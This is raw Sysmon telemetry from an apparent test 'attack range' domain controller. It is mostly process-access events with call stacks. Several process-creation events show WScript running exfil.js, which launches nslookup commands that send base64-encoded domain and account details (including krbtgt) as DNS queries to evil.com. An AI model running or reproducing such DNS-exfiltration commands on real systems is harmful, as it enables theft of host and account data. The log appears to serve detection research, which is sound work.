14:21:42.122{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.122{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.122{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.122{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1945-000000005F02}7052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.122{2E1864BB-18E0-629A-6742-000000005F02}39767452C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-1945-000000005F02}7052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.124{2E1864BB-18F6-629A-1945-000000005F02}7052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlidq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.106{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnendlt.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.091{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.091{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.091{2E1864BB-18F6-629A-1745-000000005F02}5196928C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-1845-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.091{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.091{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.091{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1845-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.091{2E1864BB-18F6-629A-1645-000000005F02}6200732C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-1845-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.095{2E1864BB-18F6-629A-1845-000000005F02}1220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-1645-000000005F02}6200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnendlt.tmp 2>&1 10341000x8000000000000000212515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.069{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-1745-000000005F02}5196C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.069{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-1745-000000005F02}5196C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.069{2E1864BB-18F6-629A-1745-000000005F02}5196928C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-1645-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.053{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1745-000000005F02}5196C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.053{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.053{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.053{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.053{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.053{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-1645-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.053{2E1864BB-18E0-629A-6742-000000005F02}39763460C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-1645-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.059{2E1864BB-18F6-629A-1645-000000005F02}6200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnendlt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.053{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllvepfyy.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.022{2E1864BB-18F5-629A-1445-000000005F02}79641300C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-1545-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.022{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.022{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.022{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KE